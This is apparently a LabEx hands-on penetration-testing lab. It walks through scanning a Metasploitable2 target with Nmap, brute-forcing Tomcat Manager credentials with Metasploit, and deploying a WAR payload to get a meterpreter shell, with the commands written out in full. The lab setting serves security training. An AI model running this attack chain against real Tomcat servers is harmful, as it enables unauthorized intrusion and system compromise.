LabEx
Log InJoin For Free

Exploit Tomcat Vulnerabilities with Nmap in Kali Linux

NmapNmapBeginner
Practice Now

Introduction

In this lab, you will learn the principles of exploiting Tomcat vulnerabilities and the process of attacking them. During the attack process, you will learn how to use Kali Linux and understand the attack framework Metasploit Framework (MSF) in Kali. The target machine to be penetrated in this lab is Metasploitable2, based on the Kali environment provided by LabEx.

Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/installation("Installation and Setup") nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/timing_performance("Timing and Performance") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") subgraph Lab Skills nmap/installation -.-> lab-416130{{"Exploit Tomcat Vulnerabilities with Nmap in Kali Linux"}} nmap/port_scanning -.-> lab-416130{{"Exploit Tomcat Vulnerabilities with Nmap in Kali Linux"}} nmap/target_specification -.-> lab-416130{{"Exploit Tomcat Vulnerabilities with Nmap in Kali Linux"}} nmap/timing_performance -.-> lab-416130{{"Exploit Tomcat Vulnerabilities with Nmap in Kali Linux"}} nmap/service_detection -.-> lab-416130{{"Exploit Tomcat Vulnerabilities with Nmap in Kali Linux"}} end

Scan the Target Machine for Network Vulnerabilities

In a typical penetration test, we need to further attack the target machine. The first thing we need to do is to perform a penetration scan on the target machine. During the scanning process, we can discover the services provided by the machine, and then determine whether there are vulnerabilities based on the information available. Next, we attempt to penetrate the potential vulnerabilities and ultimately compromise the target machine to obtain its vulnerabilities.

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:
sudo virsh start Metasploitable2

Wait for the target machine to start, it may take 1-3 minutes.

  1. Test the connectivity to the target machine by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  1. Launch the Kali Linux container and enter the bash environment by running:
docker run -ti --network host b5b709a49cd5 bash
  1. Inside the Kali container, test the network connection to the target machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

  1. Then we start msfconsole and enter the operation interface:
cd ~
msfconsole
  1. In the scanning phase, Nmap is a very useful scanning tool. During the vulnerability scanning process, we can analyze and attempt potential vulnerabilities through analysis. Here, we perform a penetration scan on the target machine using the following command:
nmap -sV -T5 target

In the above command, -T sets the scanning speed:

Parameter Meaning
nmap T0 Extremely slow scan, used for IDS (Intrusion Detection System) evasion
nmap T1 Slow scan, speed between 0 and 2, can also evade some IDS
nmap T2 Reduced scan speed, usually not used
nmap T3 Default scan speed
nmap T4 May flood the target, likely to trigger the firewall
nmap T5 Insane scan speed, sacrificing accuracy for speed

Press Ctrl+D to quit the Metasploit console then start the inspection

Brute-force the Tomcat Password

In this step, we will start exploiting the Tomcat vulnerability. We will use the auxiliary/scanner/http/tomcat_mgr_login module, which attempts to log in to the Tomcat Manager using a set of specific usernames and passwords. If the login is successful, it outputs the result.

The attack module code:

From the scan results, we can see that port 8180 is open. Let's try to attack this port. First, in the MSF terminal, search for the Tomcat module to see if there is a corresponding vulnerability module:

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
  1. Use search to find the appropriate module:
search tomcat
  1. Use the use command to select the appropriate module:
use auxiliary/scanner/http/tomcat_mgr_login
  1. Display the parameters that need to be set:
show options
  1. Then, check the necessary parameters that need to be set, and use the set command to set the parameters:
set RHOSTS 192.168.122.102
  1. Set the port information:
set RPORT 8180
  1. Next, use the command to attack and brute-force the password:
exploit

Press Ctrl+D to quit the Metasploit console then start the inspection

Use the Tomcat Password for Penetration

After obtaining the Tomcat password from the corresponding module, we will use the password to penetrate the target machine. We will use the exploit/multi/http/tomcat_mgr_deploy module, which logs into the Tomcat Manager and executes a payload. This payload uploads a WAR package using the PUT operation, and this WAR package contains a JSP file that provides a meterpreter backdoor shell.

The attack module code:

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
  1. Search for the appropriate module:
search tomcat
  1. Then, select the appropriate attack module:
use exploit/multi/http/tomcat_mgr_deploy
  1. Use the show command to view the necessary parameters:
show options
  1. Set the target host address and the port to attack:
set rhost 192.168.122.102
  1. Set the port information:
set rport 8180
  1. Set the httpusername account name:
set httpusername tomcat
  1. Set the httppassword password:
set httppassword tomcat
  1. Then, perform the attack (this may take approximately one minute):
exploit
  1. Alright, we have now penetrated the target machine. Next, we will verify the successful penetration. In the successful command-line terminal, enter the command:
sysinfo

Do not enter whoami, as it will cause an error because the meterpreter payload used here does not support commands like hostname, id, whoami, etc. You can use the help command to see the commands it supports:

As shown following, it displays the operating system information:

Computer        : metasploitable
OS              : Linux 2.6.24-16-server (i386)
Architecture    : x86
System Language : en_US
Meterpreter     : java/linux

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, you learned the principles of the Tomcat vulnerability and the process of attacking it. Generally, before a penetration test, we need to gather information about the target machine. During the information gathering process, we can better discover vulnerabilities and compromise the target machine. After completing this lab, you should have mastered the following knowledge points:

  • Principles of Tomcat vulnerability
  • Use of Nmap scanning
  • MSF attack process
  • Verifying successful attacks
Related Nmap Courses
Quick Start with Nmap

Quick Start with Nmap

CybersecurityNmap
Beginner